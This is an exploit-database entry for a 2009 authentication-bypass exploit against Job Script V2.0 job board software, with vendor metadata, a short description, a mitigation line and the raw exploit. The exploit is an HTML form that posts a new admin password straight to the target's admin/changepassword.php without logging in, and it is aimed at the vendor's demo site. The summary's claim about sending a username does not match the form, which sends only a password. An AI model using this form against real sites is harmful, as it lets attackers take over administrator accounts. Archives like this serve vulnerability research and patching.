header-logo
Suggest Exploit
vendor:
Job Script V2.0
by:
TiGeR-dZ
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Job Script V2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Job Script V2.0 – Job Board Software change pasword admin

Job Script V2.0 is vulnerable to authentication bypass. An attacker can exploit this vulnerability to gain access to the admin panel without authentication. This vulnerability is due to the lack of proper authentication check in the changepassword.php script. An attacker can exploit this vulnerability by sending a POST request to the changepassword.php script with a valid username and no password.

Mitigation:

Upgrade to the latest version of Job Script V2.0 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

<head>
    <title>Job Script V2.0 - Job Board Software change pasword admin </title>
 
</head>
    </head>

<body>




<div id="page">
   
      <div id="middle">
          <div class="center">
 
<table width=100% cellspacing=15>
<tr>
    <td width="223"><b>admin :</b></td><td>admin@admin.com</td>
</tr>
</table>

<body>




<div id="page">
   
      <div id="middle">
          <div class="center">
 
<table width=100% cellspacing=15>
<tr><td valign=top>


<b><i>Change password</i></b><br />
<br />





<form action=http://www.jobscriptdemo.com/admin/changepassword.php METHOD=POST>
<input type=password name=password>

<input type=submit name=submit value="Change Password">
</form>
 
</td>
</tr>
</table>





          </div>
     </div>
     <div class="clear"></div>
     
     
</div>
</body>
</html>
     






          <p>&nbsp;<p><font size="5">Cod[3]d By:TiGeR-dZ</font></div>
     </div>
     <div class="clear"></div>
     
     
</div>
<p><font size="5"> ;Script:<font color="#FF0000">Job Script V2.0 - Job Board Software</font></font></p>
<p><font size="5">Download</font><font size="5">:</font><a href="http://www.jobscript.net/job-board-software/"><font size="5">http://www.jobscript.net/job-board-software/</font></a></p>
<p><font size="5">Mail:<font color="#FF0000">Tiger-dz@live.com</font></font></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>

# milw0rm.com [2009-05-07]

Navigation

Suggest Exploit

Services By CQR